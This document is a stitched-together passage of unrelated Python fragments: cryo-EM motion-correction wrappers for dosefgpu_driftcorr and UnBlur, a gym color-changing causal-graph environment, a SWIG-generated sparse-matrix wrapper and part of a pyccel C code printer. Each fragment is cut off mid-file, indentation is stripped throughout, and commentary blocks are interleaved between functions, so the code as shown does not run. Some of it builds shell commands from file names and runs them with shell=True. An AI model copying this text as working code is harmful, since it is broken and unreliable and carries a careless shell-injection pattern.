This makes an external operating system call to the Cheng's lab GPU-based
B-factor multireference executable. It and CUDA libraries must be on the system
path and library path respectively.
NOTE: Spyder loads PATH and LD_LIBRARY_PATH from .profile, not .bashrc
"""
dosef_cmd = util.which("dosefgpu_driftcorr")
if dosef_cmd is None:
print( "Error: dosefgpu_driftcorr not found in system path." )
return
#tempFileHash = str(uuid.uuid4() ) # Key let's us multiprocess safely
stackBase = os.path.basename( os.path.splitext( self.files['stack'] )[0] )
if self.cachePath is None:
self.cachePath = "."
InName = os.path.join( self.cachePath, stackBase + u"_mcIn.mrc" )
# Unfortunately these files may as well be in the working directory.
OutAvName = os.path.join( self.cachePath, stackBase + u"_mcOutAv.mrc" )
OutStackName = os.path.join( self.cachePath, stackBase + u"_mcOut.mrc" )
logName = os.path.join( self.cachePath, stackBase + u"_mc.zor" )
mrcz.writeMRC( self.images, InName )
# Force binning to 1, as performance with binning is poor
binning = 1
if self.Brad is not None:
# Li masking is in MkPosList() in cufunc.cu (line 413)
# Their r2 is normalized and mine isn't
# Li has mask = exp( -0.5 * bfactor * r_norm**2 )
# r_norm**2 = x*x/Nx*Nx + y*y/Ny*Ny = r**2 / (Nx**2 + Ny**2)
# For non-square arrays they have a non-square (but constant frequency) filter
# RAM has mask = exp( -(r/brad)**2 )
# We can only get Bfactor approximately then but it's close enough for 3710x3838
bfac = 2.0 * (self.images.shape[1]**2 + self.images.shape[2]**2) / (self.Brad**2)
print( "Using B-factor of " + str(bfac) + " for dosefgpu_driftcorr" )
else:
bfac = 1000 # dosef default 'safe' bfactor for mediocre gain reference
# Consider: Dosef suffers at the ends of the sequence, so make the middle frame zero drift?
# align_to = np.floor( self.images.shape[0]/2 )
# This seems to cause more problems than it's worth.
align_to = 0
if self.diagWidth is not None:
fod = self.diagWidth
else:
fod = 0
# Dosef can limit search to a certain box size
if self.maxShift is None:
maxshift = 96
else:
maxshift = self.maxShift * 2
if self.startFrame is None:
self.startFrame = 0
if self.endFrame is None:
self.endFrame = 0
motion_flags = ( " " + InName
+ " -gpu " + str(gpu_id)
+ " -nss " + str(self.startFrame)
+ " -nes " + str(self.endFrame)
+ " -fod " + str(fod)
+ " -bin " + str(binning)
+ " -bft " + str(bfac)
+ " -atm -" + str(align_to)
+ " -pbx " + str(maxshift)
+ " -ssc 1 -fct " + OutStackName
+ " -fcs " + OutAvName
+ " -flg " + logName )
sub = subprocess.Popen( dosef_cmd + motion_flags, shell=True )
sub.wait()
self.loadMCLog( logName )
time.sleep(0.5)
if bool(clean):
try: os.remove(InName)
except: pass
try: os.remove(OutStackName)
except: pass
try: os.remove(OutAvName)
except: pass
try: os.remove(logName)
except: pass
def loadMCLog( self, logName ):
"""
Load and parse a MotionCorr log from disk using regular expressions.
"""
import re
# Parse to get the translations
fhMC = open( logName )
MClog = fhMC.readlines()
fhMC.close()
# Number of footer lines changes with the options you use.
# I would rather find Sum Frame #000
for linenumber, line in enumerate(MClog):
try:
test = re.findall( "Sum Frame #000", line)
if bool(test):
frameCount = int( re.findall( r"\d\d\d", line )[1] ) + 1
break
except: pass
MClog_crop = MClog[linenumber+1:linenumber+frameCount+1]
MCdrifts = np.zeros( [frameCount,2] )
for J in np.arange(0,frameCount):
MCdrifts[J,:] = re.findall( r"([+-]?\d+\.\d+)", MClog_crop[J] )[1:]
# Zorro saves translations, motioncorr saves shifts.
self.translations = -np.fliplr( MCdrifts )
if self.originMode == u'centroid':
centroid = np.mean( self.translations, axis=0 )
self.translations -= centroid
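The regex-and-negate step in `loadMCLog()` can be sketched in isolation: each log line carries per-frame shift values, the floats are pulled out with a decimal-number regex, and MotionCorr's *shifts* are negated and axis-flipped into Zorro's *translations*. The sample log lines below are fabricated for illustration only.

```python
import re
import numpy as np

# Hypothetical MotionCorr-style lines: "frame  shift_x  shift_y".
log_lines = ["...... Frame (  1) shift:    1.50    -0.25",
             "...... Frame (  2) shift:   -2.00     0.75"]
drifts = np.zeros((len(log_lines), 2))
for j, line in enumerate(log_lines):
    # Capture signed decimals; take the two shift values per line.
    drifts[j, :] = re.findall(r"([+-]?\d+\.\d+)", line)[:2]
# MotionCorr reports shifts; Zorro stores translations (the negation),
# with the axis order flipped, as in loadMCLog().
translations = -np.fliplr(drifts)
print(translations)  # [[ 0.25 -1.5 ] [-0.75  2.  ]]
```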
def xcorr2_unblur1_02( self, dosePerFrame = None, minShift = 2.0, terminationThres = 0.1,
maxIteration=10, verbose=False, loadResult=True, clean=True ):
"""
Calls UnBlur by <NAME> Rohou using the Zorro interface.
"""
self.bench['unblur0'] = time.time()
unblur_exename = "unblur_openmp_7_17_15.exe"
if util.which( unblur_exename ) is None:
print( "UnBlur not found in system path" )
return
print( "Calling UnBlur for " + self.files['stack'] )
print( " written by <NAME> and <NAME>: http://grigoriefflab.janelia.org/unblur" )
print( " http://grigoriefflab.janelia.org/node/4900" )
import os
try: os.umask( self.umask ) # Why is Python not using default umask from OS?
except: pass
if self.cachePath is None:
self.cachePath = "."
# Force trailing slashes onto cachePath
stackBase = os.path.basename( os.path.splitext( self.files[u'stack'] )[0] )
frcOutName = os.path.join( self.cachePath, stackBase + u"_unblur_frc.txt" )
shiftsOutName = os.path.join( self.cachePath, stackBase + u"_unblur_shifts.txt" )
outputAvName = os.path.join( self.cachePath, stackBase + u"_unblur.mrc" )
outputStackName = os.path.join( self.cachePath, stackBase + u"_unblur_movie.mrc" )
ps = self.pixelsize * 10.0
if 'dose' in self.filterMode:
doDoseFilter = True
if dosePerFrame is None:
# We have to guesstimate the dose per frame in e/A^2 if it's not provided
dosePerFrame = np.mean( self.images ) / (ps*ps)
preExposure = 0.0
if 'dosenorm' in self.filterMode:
restoreNoise=True
else:
restoreNoise=False
else:
doDoseFilter = False
if self.Brad is not None:
# Li masking is in MkPosList() in cufunc.cu (line 413)
# Their r2 is normalized and mine isn't
# Li has mask = exp( -0.5 * bfactor * r_norm**2 )
# r_norm**2 = x*x/Nx*Nx + y*y/Ny*Ny = r**2 / (Nx**2 + Ny**2)
# For non-square arrays they have a non-square (but constant frequency) filter
# RAM has mask = exp( -(r/brad)**2 )
# We can only get Bfactor approximately then but it's close enough for 3710x3838
bfac = 2.0 * (self.images.shape[1]**2 + self.images.shape[2]**2) / (self.Brad**2)
print( "Using B-factor of " + str(bfac) + " for UnBlur" )
else:
bfac = 1500 # dosef default 'safe' bfactor for mediocre gain reference
outerShift = self.maxShift * ps
# RAM: I see no reason to let people change the Fourier cross masking
vertFouMaskHW = 1
horzFouMaskHW = 1
try:
mrcName = os.path.join( self.cachePath, stackBase + "_unblurIN.mrc" )
mrcz.writeMRC( self.images, mrcName )
except:
print( "Error in exporting MRC file to UnBlur" )
return
# Are there flags for unblur? Check the source code.
flags = "" # Not using any flags
unblurexec = ( unblur_exename + " " + flags + " << STOP_PARSING \n" + mrcName )
unblurexec = (unblurexec + "\n" + str(self.images.shape[0]) + "\n" +
outputAvName + "\n" + shiftsOutName + "\n" + str(ps) + "\n" +
str(doDoseFilter) )
if bool(doDoseFilter):
unblurexec += "\n" + str(dosePerFrame) + "\n" + str(self.voltage) + "\n" + str(preExposure)
unblurexec += ("\n yes \n" + outputStackName + "\n yes \n" +
frcOutName + "\n" + str(minShift) + "\n" + str(outerShift) + "\n" +
str(bfac) + "\n" + str( np.int(vertFouMaskHW) ) + "\n" + str( np.int(horzFouMaskHW) ) + "\n" +
str(terminationThres) + "\n" + str(maxIteration) )
if bool(doDoseFilter):
unblurexec += "\n" + str(restoreNoise)
unblurexec += "\n" + str(verbose)
unblurexec = unblurexec + "\nSTOP_PARSING"
print( unblurexec )
sub = subprocess.Popen( unblurexec, shell=True )
sub.wait()
try:
# Their FRC is significantly different from mine.
self.FRC = np.loadtxt(frcOutName, comments='#', skiprows=0 )
self.translations = np.loadtxt( shiftsOutName, | |
"""Gym environment for chnging colors of shapes."""
import numpy as np
import torch
import torch.nn as nn
import gym
from collections import OrderedDict
from dataclasses import dataclass
from gym import spaces
from gym.utils import seeding
import matplotlib as mpl
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from PIL import Image
import skimage
from cswm import utils
import random
mpl.use('Agg')
def random_dag(M, N, g = None):
"""Generate a random Directed Acyclic Graph (DAG) with a given number of nodes and edges."""
if M == 3:
return np.array([[0, 0, 0],[1, 0, 0], [1, 0, 0]])
if M == 5:
return np.array([[0., 0., 0., 0., 0.],
[1., 0., 0., 0., 0.],
[1., 0., 0., 0., 0.],
[1., 1., 0., 0., 0.],
[0., 0., 1., 0., 0.]])
if g is None:
expParents = 5
idx = np.arange(M).astype(np.float32)[:,np.newaxis]
idx_maxed = np.minimum(idx * 0.5, expParents)
p = np.broadcast_to(idx_maxed/(idx+1), (M, M))
B = np.random.binomial(1, p)
B = np.tril(B, -1)
return B
else:
gammagt = np.zeros((M, M))
for e in g.split(","):
if e == "": continue
nodes = e.split("->")
if len(nodes) <= 1: continue
nodes = [int(n) for n in nodes]
for src, dst in zip(nodes[:-1], nodes[1:]):
if dst > src:
gammagt[dst,src] = 1
elif dst == src:
raise ValueError("Edges are not allowed from " +
str(src) + " to oneself!")
else:
raise ValueError("Edges are not allowed from " +
str(src) + " to ancestor " +
str(dst) + " !")
return gammagt
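`random_dag()` guarantees acyclicity by construction: `np.tril(B, -1)` keeps only strictly lower-triangular entries, so every edge points from a higher-index node to a strictly lower-index one and no cycle (or self-loop) can form. A quick check, mirroring the fixed `M == 5` matrix above:

```python
import numpy as np

# The M == 5 adjacency matrix returned by random_dag().
A = np.array([[0., 0., 0., 0., 0.],
              [1., 0., 0., 0., 0.],
              [1., 0., 0., 0., 0.],
              [1., 1., 0., 0., 0.],
              [0., 0., 1., 0., 0.]])
# Strictly lower-triangular => all edges go "downward" in index => a DAG.
assert np.array_equal(A, np.tril(A, -1))
```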
def diamond(r0, c0, width, im_size):
rr, cc = [r0, r0 + width // 2, r0 + width, r0 + width // 2], [c0 + width // 2, c0, c0 + width // 2, c0 + width]
return skimage.draw.polygon(rr, cc, im_size)
def square(r0, c0, width, im_size):
rr, cc = [r0, r0 + width, r0 + width, r0], [c0, c0, c0 + width, c0 + width]
return skimage.draw.polygon(rr, cc, im_size)
def triangle(r0, c0, width, im_size):
rr, cc = [r0, r0 + width, r0 + width], [c0 + width//2, c0, c0 + width]
return skimage.draw.polygon(rr, cc, im_size)
def cross(r0, c0, width, im_size):
diff1 = width // 3 + 1
diff2 = 2 * width // 3
rr = [r0 + diff1, r0 + diff2, r0 + diff2, r0 + width, r0 + width,
r0 + diff2, r0 + diff2, r0 + diff1, r0 + diff1, r0, r0, r0 + diff1]
cc = [c0, c0, c0 + diff1, c0 + diff1, c0 + diff2, c0 + diff2, c0 + width,
c0 + width, c0 + diff2, c0 + diff2, c0 + diff1, c0 + diff1]
return skimage.draw.polygon(rr, cc, im_size)
def pentagon(r0, c0, width, im_size):
diff1 = width // 3 - 1
diff2 = 2 * width // 3 + 1
rr = [r0 + width // 2, r0 + width, r0 + width, r0 + width // 2, r0]
cc = [c0, c0 + diff1, c0 + diff2, c0 + width, c0 + width // 2]
return skimage.draw.polygon(rr, cc, im_size)
def parallelogram(r0, c0, width, im_size):
rr, cc = [r0, r0 + width, r0 + width, r0], [c0, c0 + width // 2, c0 + width, c0 + width - width // 2]
return skimage.draw.polygon(rr, cc, im_size)
def scalene_triangle(r0, c0, width, im_size):
rr, cc = [r0, r0 + width, r0 + width//2], [c0 + width - width // 2, c0, c0 + width]
return skimage.draw.polygon(rr, cc, im_size)
def fig2rgb_array(fig):
fig.canvas.draw()
buffer = fig.canvas.tostring_rgb()
width, height = fig.canvas.get_width_height()
return np.frombuffer(buffer, dtype=np.uint8).reshape(height, width, 3)
def render_cubes(objects, width):
voxels = np.zeros((width, width, width), dtype=bool)
colors = np.empty(voxels.shape, dtype=object)
cols = ['purple', 'green', 'orange', 'blue', 'brown']
for i, pos in objects.items():
voxels[pos[0], pos[1], 0] = True
colors[pos[0], pos[1], 0] = cols[i]
fig = plt.figure()
ax = Axes3D(fig)
ax.w_zaxis.set_pane_color((0.5, 0.5, 0.5, 1.0))
ax.w_xaxis.set_pane_color((1.0, 1.0, 1.0, 1.0))
ax.w_yaxis.set_pane_color((1.0, 1.0, 1.0, 1.0))
ax.w_zaxis.line.set_lw(0.)
ax.set_xticks([])
ax.set_yticks([])
ax.set_zticks([])
ax.voxels(voxels, facecolors=colors, edgecolor='k')
im = fig2rgb_array(fig)
plt.close(fig)
im = np.array( # Crop and resize
Image.fromarray(im[215:455, 80:570]).resize((50, 50), Image.LANCZOS))
return im / 255.
class MLP(nn.Module):
def __init__(self, dims):
super().__init__()
self.layers = []
for i in range(1, len(dims)):
self.layers.append(nn.Linear(dims[i-1], dims[i]))
torch.nn.init.orthogonal_(self.layers[-1].weight.data, 3.5)
torch.nn.init.uniform_(self.layers[-1].bias.data, -2.1, +2.1)
self.layers = nn.ModuleList(self.layers)
def forward(self, x, mask):
x = x * mask
for i, l in enumerate(self.layers):
if i == len(self.layers) - 1:
x = torch.softmax(l(x), dim = 1)
else:
x = torch.relu(l(x))
#print(x)
x = torch.distributions.one_hot_categorical.OneHotCategorical(probs = x).sample()
return x
@dataclass
class Coord:
x: int
y: int
def __add__(self, other):
return Coord(self.x + other.x,
self.y + other.y)
@dataclass
class Object:
pos: Coord
color: int
class ColorChanging(gym.Env):
"""Gym environment for block pushing task."""
def __init__(self, width=5, height=5, render_type='cubes',
*, num_objects=5,
num_colors=None, max_steps = 50, seed=None):
np.random.seed(0)
torch.manual_seed(0)
self.width = width
self.height = height
self.render_type = render_type
self.num_objects = num_objects
if num_colors is None:
num_colors = num_objects
self.num_colors = num_colors
self.num_actions = self.num_objects * self.num_colors
self.mlps = []
self.mask = None
colors = ['blue', 'green', 'yellow', 'white', 'red']
self.colors, _ = utils.get_colors_and_weights(cmap = 'Set1', num_colors = self.num_colors)#[mpl.colors.to_rgba(colors[i]) for i in range(self.num_colors)]
self.object_to_color = [torch.zeros(self.num_colors) for _ in range(self.num_objects)]
self.np_random = None
self.game = None
self.target = None
# Initialize to pos outside of env for easier collision resolution.
self.objects = OrderedDict()
self.adjacency_matrix = None
mlp_dims = [self.num_objects * self.num_colors, 4 * self.num_objects * self.num_colors, self.num_colors]
self.mlps = []
for i in range(self.num_objects):
self.mlps.append(MLP(mlp_dims))
num_nodes = self.num_objects
num_edges = np.random.randint(num_nodes, (((num_nodes) * (num_nodes - 1)) // 2) + 1)
#if graph is None:
self.adjacency_matrix = random_dag(num_nodes, num_edges)
#else:
# self.adjacency_matrix = random_dag(num_nodes, num_nodes, g = graph)
self.adjacency_matrix = torch.from_numpy(self.adjacency_matrix).float()
# Generate masks so that each variable only receives input from its parents.
self.generate_masks()
# If True, then check for collisions and don't allow two
# objects to occupy the same position.
self.collisions = True
self.action_space = spaces.Discrete(self.num_actions)
self.observation_space = spaces.Box(
low=0, high=1,
shape=(3, self.width, self.height),
dtype=np.float32
)
self.seed(seed)
self.reset()
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def render_grid(self):
im = np.zeros((3, self.width, self.height))
for idx, obj in self.objects.items():
im[:, obj.pos.x, obj.pos.y] = self.colors[obj.color][:3]
return im
def render_circles(self):
im = np.zeros((self.width * 10, self.height * 10, 3), dtype=np.float32)
for idx, obj in self.objects.items():
rr, cc = skimage.draw.circle(
obj.pos.x * 10 + 5, obj.pos.y * 10 + 5, 5, im.shape)
im[rr, cc, :] = self.colors[obj.color][:3]
return im.transpose([2, 0, 1])
def render_shapes(self):
im = np.zeros((self.width * 10, self.height * 10, 3), dtype=np.float32)
for idx, obj in self.objects.items():
if idx == 0:
rr, cc = skimage.draw.circle(
obj.pos.x * 10 + 5, obj.pos.y * 10 + 5, 5, im.shape)
im[rr, cc, :] = self.colors[obj.color][:3]
elif idx == 1:
rr, cc = triangle(
obj.pos.x * 10, obj.pos.y * 10, 10, im.shape)
im[rr, cc, :] = self.colors[obj.color][:3]
elif idx == 2:
rr, cc = square(
obj.pos.x * 10, obj.pos.y * 10, 10, im.shape)
im[rr, cc, :] = self.colors[obj.color][:3]
elif idx == 3:
rr, cc = diamond(
obj.pos.x * 10, obj.pos.y * 10, 10, im.shape)
im[rr, cc, :] = self.colors[obj.color][:3]
elif idx == 4:
rr, cc = pentagon(
obj.pos.x * 10, obj.pos.y * 10, 10, im.shape)
im[rr, cc, :] = self.colors[obj.color][:3]
elif idx == 5:
rr, cc = cross(
obj.pos.x * 10, obj.pos.y * 10, 10, im.shape)
im[rr, cc, :] = self.colors[obj.color][:3]
elif idx == 6:
rr, cc = parallelogram(
obj.pos.x * 10, obj.pos.y * 10, 10, im.shape)
im[rr, cc, :] = self.colors[obj.color][:3]
else:
rr, cc = scalene_triangle(
obj.pos.x * 10, obj.pos.y * 10, 10, im.shape)
im[rr, cc, :] = self.colors[obj.color][:3]
return im.transpose([2, 0, 1])
def render_cubes(self):
im = render_cubes(self.objects, self.width)
return im.transpose([2, 0, 1])
def render(self):
return dict(
grid=self.render_grid,
circles=self.render_circles,
shapes=self.render_shapes,
cubes=self.render_cubes,
)[self.render_type]()
def get_state(self):
im = np.zeros(
(self.num_objects * self.num_colors, self.width, self.height), dtype=np.int32)
for idx, obj in self.objects.items():
im[idx * self.num_colors + obj.color, obj.pos.x, obj.pos.y] = 1
return im
def generate_masks(self):
mask = self.adjacency_matrix.unsqueeze(-1)
mask = mask.repeat(1, 1, self.num_colors)
self.mask = mask.view(self.adjacency_matrix.size(0), -1)
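The `unsqueeze`/`repeat`/`view` chain in `generate_masks()` expands the (M x M) adjacency matrix into an (M, M * num_colors) input mask, so that MLP i only sees the one-hot color slots of node i's parents. A NumPy equivalent of that expansion (same flattening order), shown here with 3 objects and 2 colors:

```python
import numpy as np

# Hypothetical adjacency: node 1 has parent 0; node 2 has parents 0 and 1.
adj = np.array([[0., 0., 0.],
                [1., 0., 0.],
                [1., 1., 0.]])
num_colors = 2
# Repeat each adjacency entry once per color slot along the input axis;
# this matches torch's unsqueeze(-1).repeat(1, 1, C).view(M, -1).
mask = np.repeat(adj, num_colors, axis=1)
# Row 2 exposes the color slots of parents 0 and 1, and masks its own.
assert mask[2].tolist() == [1., 1., 1., 1., 0., 0.]
```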
def reset(self, graph = None):
self.object_to_color = [torch.zeros(self.num_colors) for _ in range(self.num_objects)]
# Sample color for root node randomly
root_color = np.random.randint(0, self.num_colors)
self.object_to_color[0][root_color] = 1
# Sample color for other nodes using MLPs
self.sample_variables(0, do_everything = True)
self.objects = OrderedDict()
# Randomize | |
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 2.0.10
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2,6,0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_csc', [dirname(__file__)])
except ImportError:
import _csc
return _csc
if fp is not None:
try:
_mod = imp.load_module('_csc', fp, pathname, description)
finally:
fp.close()
return _mod
_csc = swig_import_helper()
del swig_import_helper
else:
import _csc
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self,class_type,name,value,static=1):
if (name == "thisown"): return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name,None)
if method: return method(self,value)
if (not static):
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self,class_type,name,value):
return _swig_setattr_nondynamic(self,class_type,name,value,0)
def _swig_getattr(self,class_type,name):
if (name == "thisown"): return self.this.own()
method = class_type.__swig_getmethods__.get(name,None)
if method: return method(self)
raise AttributeError(name)
def _swig_repr(self):
try: strthis = "proxy of " + self.this.__repr__()
except: strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object : pass
_newclass = 0
def csc_matmat_pass1(*args):
"""
csc_matmat_pass1(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
npy_int32 const [] Bp, npy_int32 const [] Bi, npy_int32 [] Cp)
csc_matmat_pass1(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Ai,
npy_int64 const [] Bp, npy_int64 const [] Bi, npy_int64 [] Cp)
"""
return _csc.csc_matmat_pass1(*args)
def csc_diagonal(*args):
"""
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
npy_bool_wrapper const [] Ax, npy_bool_wrapper [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
signed char const [] Ax, signed char [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
unsigned char const [] Ax, unsigned char [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
short const [] Ax, short [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
unsigned short const [] Ax, unsigned short [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
int const [] Ax, int [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
unsigned int const [] Ax, unsigned int [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
long long const [] Ax, long long [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
unsigned long long const [] Ax, unsigned long long [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
float const [] Ax, float [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
double const [] Ax, double [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
long double const [] Ax, long double [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
npy_cfloat_wrapper const [] Ax, npy_cfloat_wrapper [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
npy_cdouble_wrapper const [] Ax, npy_cdouble_wrapper [] Yx)
csc_diagonal(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Aj,
npy_clongdouble_wrapper const [] Ax, npy_clongdouble_wrapper [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
npy_bool_wrapper const [] Ax, npy_bool_wrapper [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
signed char const [] Ax, signed char [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
unsigned char const [] Ax, unsigned char [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
short const [] Ax, short [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
unsigned short const [] Ax, unsigned short [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
int const [] Ax, int [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
unsigned int const [] Ax, unsigned int [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
long long const [] Ax, long long [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
unsigned long long const [] Ax, unsigned long long [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
float const [] Ax, float [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
double const [] Ax, double [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
long double const [] Ax, long double [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
npy_cfloat_wrapper const [] Ax, npy_cfloat_wrapper [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
npy_cdouble_wrapper const [] Ax, npy_cdouble_wrapper [] Yx)
csc_diagonal(npy_int64 const n_row, npy_int64 const n_col, npy_int64 const [] Ap, npy_int64 const [] Aj,
npy_clongdouble_wrapper const [] Ax, npy_clongdouble_wrapper [] Yx)
"""
return _csc.csc_diagonal(*args)
def csc_tocsr(*args):
"""
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
npy_bool_wrapper const [] Ax, npy_int32 [] Bp, npy_int32 [] Bj,
npy_bool_wrapper [] Bx)
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
signed char const [] Ax, npy_int32 [] Bp, npy_int32 [] Bj, signed char [] Bx)
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
unsigned char const [] Ax, npy_int32 [] Bp, npy_int32 [] Bj, unsigned char [] Bx)
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
short const [] Ax, npy_int32 [] Bp, npy_int32 [] Bj, short [] Bx)
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
unsigned short const [] Ax, npy_int32 [] Bp, npy_int32 [] Bj, unsigned short [] Bx)
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
int const [] Ax, npy_int32 [] Bp, npy_int32 [] Bj, int [] Bx)
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
unsigned int const [] Ax, npy_int32 [] Bp, npy_int32 [] Bj, unsigned int [] Bx)
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
long long const [] Ax, npy_int32 [] Bp, npy_int32 [] Bj, long long [] Bx)
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
unsigned long long const [] Ax, npy_int32 [] Bp, npy_int32 [] Bj,
unsigned long long [] Bx)
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
float const [] Ax, npy_int32 [] Bp, npy_int32 [] Bj, float [] Bx)
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const [] Ap, npy_int32 const [] Ai,
double const [] Ax, npy_int32 [] Bp, npy_int32 [] Bj, double [] Bx)
csc_tocsr(npy_int32 const n_row, npy_int32 const n_col, npy_int32 const | |
[Declare(i.dtype, i)]
elif not isinstance(i, Variable):
decs += [FuncAddressDeclare(i)]
decs += [Declare(i.dtype, i) for i in self._additional_declare]
decs = ''.join(self._print(i) for i in decs)
self._additional_declare.clear()
sep = self._print(SeparatorComment(40))
if self._additional_args :
self._additional_args.pop()
imports = ''.join(self._print(i) for i in expr.imports)
doc_string = self._print(expr.doc_string) if expr.doc_string else ''
parts = [sep,
doc_string,
'{signature}\n{{\n'.format(signature=self.function_signature(expr)),
imports,
decs,
body,
'}\n',
sep]
return ''.join(p for p in parts if p)
def stored_in_c_pointer(self, a):
"""
Indicates whether the object a needs to be stored in a pointer
in C code.
Parameters
----------
a : Variable/FunctionAddress
"""
if not isinstance(a, Variable):
return False
return (a.is_pointer and not a.is_ndarray) or a.is_optional or \
any(a is bi for b in self._additional_args for bi in b)
def create_tmp_var(self, match_var):
tmp_var_name = self._parser.get_new_name('tmp')
tmp_var = Variable(name = tmp_var_name, dtype = match_var.dtype)
self._additional_declare.append(tmp_var)
return tmp_var
def _print_FunctionCall(self, expr):
func = expr.funcdef
# Ensure the correct syntax is used for pointers
args = []
for a, f in zip(expr.args, func.arguments):
a = a.value if a else Nil()
f = f.var
if isinstance(a, Variable) and self.stored_in_c_pointer(f):
args.append(VariableAddress(a))
elif f.is_optional and not isinstance(a, Nil):
tmp_var = self.create_tmp_var(f)
assign = Assign(tmp_var, a)
self._additional_code += self._print(assign) + '\n'
args.append(VariableAddress(tmp_var))
else :
args.append(a)
args += self._temporary_args
self._temporary_args = []
args = ', '.join(['{}'.format(self._print(a)) for a in args])
if not func.results:
return '{}({});\n'.format(func.name, args)
return '{}({})'.format(func.name, args)
def _print_Constant(self, expr):
""" Convert a Python expression with a math constant call to C
function call
Parameters
----------
expr : Pyccel ast node
Python expression with a Math constant
Returns
-------
string
String representing the value of the constant
Example
-------
math.pi ==> 3.14159265358979
"""
val = LiteralFloat(expr.value)
return self._print(val)
def _print_Return(self, expr):
code = ''
